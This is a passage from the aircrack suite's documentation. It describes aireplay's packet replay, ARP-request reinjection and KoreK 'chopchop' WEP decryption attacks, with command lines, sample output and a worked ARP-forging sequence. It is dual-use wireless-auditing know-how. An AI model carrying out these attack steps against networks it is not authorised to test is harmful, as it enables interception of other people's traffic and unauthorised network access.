          o If Atheros, try running "iwpriv ath0 mode 2" or
            "iwpriv ath0 mode 0" if patched with 20050707.
       
        I'll say it again: you can't inject with a Centrino, Hermes, ACX1xx,
        Aironet, Marvel, Broadcom or Prism54 USB chipset.
       
      + Attack 2: interactive packet replay
       
        This attack is mostly useless and is present for debugging purposes
        only. You could use it, for example, to replay "ToDS" packets coming
        from a wireless client; but in any case, attack 3 (ARP reinjection) is
        more effective.
       
        aireplay -2 -f 0 -t 1 -d FF:FF:FF:FF:FF:FF -n 90 ath0
       
      + Attack 3: ARP-request reinjection
       
        The classic ARP-request replay attack is the most effective to generate
        new IVs, and works very reliably. You need either the MAC address of an
        associated client (00:09:5B:EB:C5:2B), of a fake MAC from attack 1 (0:
        1:2:3:4:5). You may have to wait for a couple of minutes, or even
        longer, until an ARP request shows up; this attack will fail if there
        is no traffic.
       
        aireplay -3 -b 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
        Saving ARP requests in replay_arp-0627-121526.cap
        You must also start airodump to capture replies.
        Read 2493 packets (got 1 ARP requests), sent 1305 packets...
       
      + Attack 4: KoreK's "chopchop" (WEP decryption)
       
        This attack, when successful, can decrypt a WEP data packet without
        knowing the key. It can even work against dynamic WEP. However, most
        access points are not vulnerable at all. Some may seem vulnerable at
        first but actually drop data packets shorter that 60 bytes.
       
         1. First, we decrypt one packet :
           
            aireplay -4 -h 00:09:5B:EB:C5:2B ath0
           
         2. Let's have a look at the IP address :
           
            tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
            reading from file replay_dec-0627-022301.cap, link-type [...]
            IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
           
         3. Then, forge an ARP request.
           
            The source IP (192.168.1.100) doesn't matter, but the destination
            IP (192.168.1.2) must respond to ARP requests. The source MAC must
            belong to an associated station.
           
            ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
            00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
           
         4. And replay our forged ARP request :
           
            aireplay -2 -r arp.cap ath0

-------------------------------------------------------------------------------

    Finally, I'd like to thank all the many, many people who contributed to
    aircrack... you know who you are :-)

-------------------------------------------------------------------------------
